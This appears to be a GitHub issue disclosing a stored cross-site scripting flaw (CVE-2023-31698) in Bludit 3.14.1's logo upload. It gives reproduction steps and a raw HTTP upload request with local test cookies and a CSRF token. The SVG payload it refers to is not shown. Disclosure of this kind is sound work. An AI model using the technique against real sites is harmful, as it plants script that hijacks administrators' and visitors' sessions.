Headline

CVE-2023-31698: Stored XSS via SVG file Vulnerability on Bludit v3.14.1 · Issue #1509 · bludit/bludit

Bludit v3.14.1 is vulnerable to Stored Cross Site Scripting (XSS) via SVG file on site logo.

1 year ago

#xss #csrf #vulnerability #windows #firefox

Description:
I found Stored Cross-site scripting (XSS) vulnerability in your Bludit - Flat-File CMS (v3.14.1) on “General” settings to “Logo” field. When I send malicious code use svg file after then the browser give me result.

CMS Version:
v3.14.1

Affected URL:
http://127.0.0.1/bludit/admin/settings

Steps to Reproduce:

First login your admin panel.
then go to General settings and click logo section.
Now open notepad and save this code with xss.svg name with extension
Now upload this xss.svg file on logo section. So your request data will be:

POST /bludit/admin/ajax/logo-upload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Content-Type: multipart/form-data; boundary=---------------------------15560729415644048492005010998
Referer: http://127.0.0.1/bludit/admin/settings
Cookie: BLUDITREMEMBERUSERNAME=admin; BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985; BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74i
Content-Length: 651

-----------------------------15560729415644048492005010998
Content-Disposition: form-data; name="tokenCSRF"

626c201693546f472cdfc11bed0938aab8c6e480
-----------------------------15560729415644048492005010998
Content-Disposition: form-data; name="inputFile"; filename="xss.svg"
Content-Type: image/svg+xml

-----------------------------15560729415644048492005010998–